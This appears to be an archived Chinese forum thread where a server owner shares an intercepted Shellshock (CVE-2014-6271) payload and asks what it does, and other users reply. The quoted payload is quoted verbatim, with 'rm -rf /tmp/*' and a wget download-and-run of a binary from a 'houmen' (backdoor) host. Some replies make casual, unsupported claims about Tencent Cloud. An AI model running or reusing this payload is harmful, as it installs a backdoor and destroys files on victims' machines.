阿里云的 EC2 经常拦截到一些远程代码执行的脚本

vps网友提供 08-11 讨论归档 9

类似下面这样：

Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://houmen.linux22.cn:123/houmen/linux223 -o /tmp/china.z-axjx. >> /tmp/run.sh;echo echo by china.z >> /tmp/run.sh;echo chmod 777 /tmp/china.z-axjx. >> /tmp/run.sh;echo /tmp/china.z-axjx. >> /tmp/run.sh;echo rm -rf /tmp/run.sh >> /tmp/run.sh;chmod 777 /tmp/run.sh;/tmp/run.sh.

今天发现有几个脚本来自IP：182.254.217.63，百度了一下

IP地址: 182.254.217.63上海市腾讯集团

忽然觉得有点背后凉凉的，大鹅厂还有这种业务？

不过这个脚本一直没有下载成功过，不知道里面是干啥的, 有研究过的V友么?

本文由 vps网友提供，转载请注明出处

本文链接： https://www.vpsvsvps.com/discuss/a/1676471690852306944.html

标签:

08-11

看到域名犹如一股寒芒戳菊

08-11

houmen ..... 我擦以为是啥英语单词呢
放到词典里，，，，后门。，。我擦

08-11

http://houmen.linux22.cn:123/houmen ...够直接

08-11

后背凉，肾虚。

08-11

人家都给你拼写的这么明确了 “houmen”，你还问这脚本是干啥的…………

另外腾讯云确实是我见到的出点名的最不讲究的，各种垃圾伪原创站、钓鱼站、色情站……目测还有不少肉鸡

08-11

这是CVE-2014-6271的exp

08-11

腾讯云上面的色情站不要太多，，，
使用腾讯云的话QQ还给域名绿盾认证
垃圾站首选

08-11

没卵用，整个ip段扫描的吧，我的静态博客也有这

08-11

腾讯云的吧